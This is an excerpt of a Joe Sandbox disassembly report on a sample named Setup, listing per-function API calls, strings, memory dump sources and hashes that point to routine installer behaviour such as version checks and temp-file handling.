                                                                                                                                                                    Function 69DA7DB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DA7DB7
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                      • Part of subcall function 69D74CB2: __EH_prolog3.LIBCMT ref: 69D74CB9
                                                                                                                                                                      • Part of subcall function 69D7395E: __EH_prolog3.LIBCMT ref: 69D73965
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: Operation Type$Operation: %s
                                                                                                                                                                    • API String ID: 431132790-3288381836
                                                                                                                                                                    • Opcode ID: 516dea513373046e71bdda30e4bfa87c0f6057ebae5fecf4ef6c176a7d9c0d1a
                                                                                                                                                                    • Instruction ID: 4e25bab52a6fe29d164f560fe1ec648d096eb7a1e34252d3ba84afbcabe189d6
                                                                                                                                                                    • Opcode Fuzzy Hash: 516dea513373046e71bdda30e4bfa87c0f6057ebae5fecf4ef6c176a7d9c0d1a
                                                                                                                                                                    • Instruction Fuzzy Hash: 7C215875900249EFCB00DBE8C945EAEBBF9BF14308F148069E144EB791C7349A05CBB2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D836F8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D836FF
                                                                                                                                                                      • Part of subcall function 69D838A1: __EH_prolog3.LIBCMT ref: 69D838A8
                                                                                                                                                                      • Part of subcall function 69DA833E: __EH_prolog3.LIBCMT ref: 69DA8345
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID: CustomError$ReturnCode
                                                                                                                                                                    • API String ID: 431132790-4065127629
                                                                                                                                                                    • Opcode ID: 2d49379f5eb4a5c5b4dc77f13f3848461368617a860507946f94b4de21cf97c1
                                                                                                                                                                    • Instruction ID: 77e69e1bce5471d3187e0ce8f64f09b1035b6e9067cf8cec026c0dbf6b882ac7
                                                                                                                                                                    • Opcode Fuzzy Hash: 2d49379f5eb4a5c5b4dc77f13f3848461368617a860507946f94b4de21cf97c1
                                                                                                                                                                    • Instruction Fuzzy Hash: FC213375A0020A9FCF00DFA8C950A6DB7B9BF45318F148569E415DB781CB75E905CB61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698DF0C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698DF0CF
                                                                                                                                                                      • Part of subcall function 698EF21D: _wcsnlen.LIBCMT ref: 698EF1B2
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,00000010,HFI,00000000,00000000,698D79E4,00000004,698F57E2,?,?,?,?,?,?,00000024,698DF18B), ref: 698DF14B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                                                                                                    • String ID: HFI
                                                                                                                                                                    • API String ID: 1332513528-686494941
                                                                                                                                                                    • Opcode ID: 3c05fbfc40dd118ec282818e3b5f99311d7c016b8ee802dc7323a1fa18775f5c
                                                                                                                                                                    • Instruction ID: a5f559cc97ce56193d011ef7b36204fe13275f55f751d9c4e5552e81557b6690
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c05fbfc40dd118ec282818e3b5f99311d7c016b8ee802dc7323a1fa18775f5c
                                                                                                                                                                    • Instruction Fuzzy Hash: 4311AC393001489FCB05DF7CC94469EB7A4AF3535CF00AA5DE462EB290DB70990AAB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAFF21 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _wcsnlen.LIBCMT ref: 69DAFF54
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 69DAFF8A
                                                                                                                                                                      • Part of subcall function 69DC8E8C: __CxxThrowException@8.LIBCMT ref: 69DC8EA0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Exception@8Throw_memcpy_s_wcsnlen
                                                                                                                                                                    • String ID: OS Version Information
                                                                                                                                                                    • API String ID: 31407445-551053750
                                                                                                                                                                    • Opcode ID: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                                                                                                    • Instruction ID: e22f1f63b918449d925a08670c66a484aa9f45ab939e81167ca5c2944ba51c19
                                                                                                                                                                    • Opcode Fuzzy Hash: 9c63a639ee519eab536a0c439a5492597f7296c8b7f45d34778611928766e027
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D01C436600108EF8B04CF6CCC44D9E77A9EB85364711C17DF4289B650EA34EA15CBA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69D9531E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69D95325
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                    • DeleteFileW.KERNEL32(?,00000010,HFI,00000000,?,69D6AB18,00000004,69DBA448,F0D05EFD,F0D05EFD,?,?,69DA4B23), ref: 69D95399
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DeleteFileH_prolog3_wcsnlen
                                                                                                                                                                    • String ID: HFI
                                                                                                                                                                    • API String ID: 1332513528-686494941
                                                                                                                                                                    • Opcode ID: 2c77014de1b57832257d52fb04515d248f90de629ea8cdd0ed2297700c88e95c
                                                                                                                                                                    • Instruction ID: d3ff3fe23d7e6da9c6dc92dc78e67680a39990d92612597676e4e292fc3693e9
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c77014de1b57832257d52fb04515d248f90de629ea8cdd0ed2297700c88e95c
                                                                                                                                                                    • Instruction Fuzzy Hash: 0211ED39200100DFC704EFB8C940AAEB7A9BF54318F109679E960DBAA0DBB0D90487A2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB356C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB3573
                                                                                                                                                                      • Part of subcall function 69D7579B: _memset.LIBCMT ref: 69D757CA
                                                                                                                                                                      • Part of subcall function 69D7579B: GetVersionExW.KERNEL32 ref: 69D757DF
                                                                                                                                                                      • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000001), ref: 69D757F5
                                                                                                                                                                      • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000001,00000001), ref: 69D757FD
                                                                                                                                                                      • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000020,00000001,?,00000001,00000001), ref: 69D75805
                                                                                                                                                                      • Part of subcall function 69D7579B: VerSetConditionMask.KERNEL32(00000000,?,00000010,00000001,?,00000020,00000001,?,00000001,00000001), ref: 69D7580D
                                                                                                                                                                      • Part of subcall function 69D7579B: VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 69D75818
                                                                                                                                                                    Strings
                                                                                                                                                                    • CSDReleaseType, xrefs: 69DB35CC
                                                                                                                                                                    • SYSTEM\CurrentControlSet\Control\Windows, xrefs: 69DB35E1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ConditionMask$Version$H_prolog3InfoVerify_memset
                                                                                                                                                                    • String ID: CSDReleaseType$SYSTEM\CurrentControlSet\Control\Windows
                                                                                                                                                                    • API String ID: 3830908078-406884543
                                                                                                                                                                    • Opcode ID: 0417722cdfc3b88be0da9e3e87249e09934956600f9e88dc545338582cac6bad
                                                                                                                                                                    • Instruction ID: a8d05657eab009e9a7ed021e4cb76f127eb2df16a862b42185ca8b794522e060
                                                                                                                                                                    • Opcode Fuzzy Hash: 0417722cdfc3b88be0da9e3e87249e09934956600f9e88dc545338582cac6bad
                                                                                                                                                                    • Instruction Fuzzy Hash: 6A01A5F6D10128ABDB14CF58C8116A83B90BB11394F068175FD69EF651C739DA44D7E1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB1602 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?,69DAFA6E,?,?,?,?,?,?,69DB34F1,69DAFA6E,000000FF), ref: 69DB1637
                                                                                                                                                                    • GetLastError.KERNEL32(?,69DAFA6E,?,?,?,?,?,?,69DB34F1,69DAFA6E,000000FF,?,?,00000738,69DAFA6E,?), ref: 69DB1647
                                                                                                                                                                      • Part of subcall function 69D77479: __EH_prolog3.LIBCMT ref: 69D77480
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DiskErrorFreeH_prolog3LastSpace
                                                                                                                                                                    • String ID: GetDiskFreeSpaceEx
                                                                                                                                                                    • API String ID: 3776785849-3355056173
                                                                                                                                                                    • Opcode ID: 3d3522148b4631268f037940855427a59cab28eda5d2c60f99f094890b3a6008
                                                                                                                                                                    • Instruction ID: c50ecc852bcbbef05184b248a87a80c7c7a1ebd6d78919d24d78b22df4095356
                                                                                                                                                                    • Opcode Fuzzy Hash: 3d3522148b4631268f037940855427a59cab28eda5d2c60f99f094890b3a6008
                                                                                                                                                                    • Instruction Fuzzy Hash: BC0128B6900219FB8B00DF98D9458EEBBB9EB98710F108459E905F7210D770AB09CBE0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DAEC5A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DAEC61
                                                                                                                                                                      • Part of subcall function 69DA3B2B: __EH_prolog3.LIBCMT ref: 69DA3B32
                                                                                                                                                                      • Part of subcall function 69DA3B2B: InitializeCriticalSection.KERNEL32(00000002,?,00000000,00000000,00000002,?,?,00000000,?,?,?,?,00000008,69DAEC79,?,?), ref: 69DA3BC9
                                                                                                                                                                      • Part of subcall function 69DB2C16: PathFileExistsW.SHLWAPI(00000000), ref: 69DB2CA8
                                                                                                                                                                      • Part of subcall function 69DB2C16: __CxxThrowException@8.LIBCMT ref: 69DB2CE7
                                                                                                                                                                      • Part of subcall function 69DB2C16: CopyFileW.KERNEL32(00000010,00000000,00000000,?), ref: 69DB2D19
                                                                                                                                                                      • Part of subcall function 69DB2C16: SetFileAttributesW.KERNEL32(?,00000080), ref: 69DB2D32
                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(?,?,?,.html,00000001,00000000,69DA747C,00000000,00000000,?,?,?,?,?,?,?), ref: 69DAECBB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$CriticalH_prolog3InitializeSection$AttributesCopyException@8ExistsPathThrow
                                                                                                                                                                    • String ID: .html
                                                                                                                                                                    • API String ID: 4277916732-2179875201
                                                                                                                                                                    • Opcode ID: eca68472a08309efefbaa2c0df8179e3af182479e6264e886300bfd3482815c1
                                                                                                                                                                    • Instruction ID: d301b9ecbf354ba2a04ed9b32618f6f7e4cb14e293a4b2cf40531702cb34e0ea
                                                                                                                                                                    • Opcode Fuzzy Hash: eca68472a08309efefbaa2c0df8179e3af182479e6264e886300bfd3482815c1
                                                                                                                                                                    • Instruction Fuzzy Hash: 18F0C279600241EBDB00DFA4C544BDCBB6A7F2430CF40D038D50467A40CB74AA1DE7B2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698E6615 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,80000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 698E6636
                                                                                                                                                                    • SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000013,?,698E72CF), ref: 698E6648
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4207541741.00000000698D1000.00000020.00000001.01000000.00000012.sdmp, Offset: 698D0000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4207446092.00000000698D0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207670274.000000006990F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207744711.0000000069910000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207783387.0000000069912000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4207825935.0000000069915000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_698d0000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Create
                                                                                                                                                                    • String ID: tooltips_class32
                                                                                                                                                                    • API String ID: 870168347-1918224756
                                                                                                                                                                    • Opcode ID: 7547cf8f2065cf1403be3672305bf980b3c8b87ed53567a11caef222d7e95414
                                                                                                                                                                    • Instruction ID: 943fed8238d4526e4d073f244db319bbb9532fc2fb4d40c42652e331b8f9660f
                                                                                                                                                                    • Opcode Fuzzy Hash: 7547cf8f2065cf1403be3672305bf980b3c8b87ed53567a11caef222d7e95414
                                                                                                                                                                    • Instruction Fuzzy Hash: 57E042B1547171BEE6745A6AAC0CFE76E9CEF8B6B0F214218B92CE21C1C6245914C7F0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DB02A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DB02AA
                                                                                                                                                                    • GetCommandLineW.KERNEL32(0000001C,69DA9382,02602230,69D6A794,?,69D7BFC7,00000018,69D7BC3C,02602254,?,?,?,?,?,?,UserExperienceDataCollection), ref: 69DB02AF
                                                                                                                                                                      • Part of subcall function 69D73E77: __EH_prolog3.LIBCMT ref: 69D73E7E
                                                                                                                                                                      • Part of subcall function 69D73A16: __EH_prolog3.LIBCMT ref: 69D73A1D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$CommandLine
                                                                                                                                                                    • String ID: CEIPconsent
                                                                                                                                                                    • API String ID: 1384747822-2245497618
                                                                                                                                                                    • Opcode ID: 9d7b07cfed6809400b7bc3c7139bab2bfa80ab96e2b76abe56b8cb00afcf8b2c
                                                                                                                                                                    • Instruction ID: 6d8b885e94cba9548238ea9e4649c15e76ccb747c36e2d0b2e3a790b5819ab19
                                                                                                                                                                    • Opcode Fuzzy Hash: 9d7b07cfed6809400b7bc3c7139bab2bfa80ab96e2b76abe56b8cb00afcf8b2c
                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE08C7A980249AAEF10EBE0C804BCCB3A85F19208F94A430E200BB940CB28D20C8B70
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 69DBA1E6 Relevance: 4.7, APIs: 3, Instructions: 225COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 69DBA1ED
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(00000020,69D953D9,00000000,?,?,69DA4B23), ref: 69DBA1FD
                                                                                                                                                                      • Part of subcall function 69D95238: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 69D95254
                                                                                                                                                                      • Part of subcall function 69D95238: _memset.LIBCMT ref: 69D9526E
                                                                                                                                                                      • Part of subcall function 69D95238: Process32FirstW.KERNEL32(00000000,?), ref: 69D95288
                                                                                                                                                                      • Part of subcall function 69D95238: FindCloseChangeNotification.KERNEL32(00000000), ref: 69D952B7
                                                                                                                                                                      • Part of subcall function 69DC8EAB: _memcpy_s.LIBCMT ref: 69DC8EFC
                                                                                                                                                                      • Part of subcall function 69DA8608: __wcsicoll.LIBCMT ref: 69DA8626
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,00000000,69DA4B23,69DA4614,69DA4B23,00000000,00000010,00000010,?,00000000,69DA4614,?,?,69DA4B23), ref: 69DBA415
                                                                                                                                                                      • Part of subcall function 69D95238: Process32NextW.KERNEL32(00000000,0000022C), ref: 69D952A3
                                                                                                                                                                      • Part of subcall function 69DC8AFC: _wcsnlen.LIBCMT ref: 69DC8B0C
                                                                                                                                                                      • Part of subcall function 69D9531E: __EH_prolog3.LIBCMT ref: 69D95325
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000004.00000002.4208182906.0000000069D51000.00000020.00000001.01000000.0000000E.sdmp, Offset: 69D50000, based on PE: true
                                                                                                                                                                    • Associated: 00000004.00000002.4208117122.0000000069D50000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208294741.0000000069DFE000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208346406.0000000069DFF000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208393617.0000000069E07000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    • Associated: 00000004.00000002.4208439481.0000000069E0A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_4_2_69d50000_Setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3Process32$ChangeCloseCreateCurrentFindFirstNextNotificationPathProcessSnapshotTempToolhelp32__wcsicoll_memcpy_s_memset_wcsnlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3672672585-0
                                                                                                                                                                    • Opcode ID: a66b11d7da70d124429b4453696e958c6160907fd5ef8929744d252e1ad324eb
                                                                                                                                                                    • Instruction ID: e0fd0ff0444d1b73ea3e0fdafa73168ba2e5cc1b79bf4206c491ef504d50cba0
                                                                                                                                                                    • Opcode Fuzzy Hash: a66b11d7da70d124429b4453696e958c6160907fd5ef8929744d252e1ad324eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 08915CB5900244DFDB00DFB8C949AEDBBB8AF05328F1496B8E450EB795DB349904CB72
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 698F5584 Relevance: 4.7, APIs: 3, Instructions: 221COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 698F558B
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00000024,698DF18B,?), ref: 698F559B
                                                                                                                                                                      • Part of subcall function 698DEFE2: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 698DEFFE
                                                                                                                                                                      • Part of subcall function 698DEFE2: _memset.LIBCMT ref: 698DF018
                                                                                                                                                                      • Part of subcall function 698DEFE2: Process32FirstW.KERNEL32(00000000,?), ref: 698DF032
                                                                                                                                                                      • Part of subcall function 698DEFE2: FindCloseChangeNotification.KERNEL32(00000000), ref: 698DF061
                                                                                                                                                                      • Part of subcall function 698F83FD: _memcpy_s.LIBCMT ref: 698F844E
                                                                                                                                                                      • Part of subcall function 698EEB56: __wcsicoll.LIBCMT ref: 698EEB74
